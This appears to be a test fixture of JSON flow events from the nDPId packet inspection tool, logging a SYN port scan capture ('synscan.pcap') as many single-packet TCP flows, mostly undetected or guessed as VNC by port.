-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":360,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20222,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":360,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":848,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7937,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":848,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7937,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7938,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7938,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":899,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7937,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":899,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7937,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1259,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060392,"flow_last_seen":1278275060392,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7938,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1259,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060392,"flow_last_seen":1278275060392,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7938,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1841,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1801,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1841,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1920,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1801,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1920,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":885,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":34571,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":885,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":34571,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":614,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3851,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":614,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3851,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":970,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":34571,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":970,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":34571,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":590,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":34572,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":590,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":34572,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":683,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3851,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":683,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3851,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5900,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"VNC","breed":"Acceptable","category":"RemoteAccess"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1046,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":34573,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1046,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":34573,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":665,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":34572,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":665,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":34572,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":838,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5901,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"VNC","breed":"Acceptable","category":"RemoteAccess"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":838,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5901,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":453,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1805,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":453,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1805,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5900,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"VNC","breed":"Acceptable","category":"RemoteAccess"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1691,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9998,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1691,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":34573,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":34573,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1022,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5902,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1022,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5902,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":909,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5901,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"VNC","breed":"Acceptable","category":"RemoteAccess"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":909,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5901,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":495,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1805,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
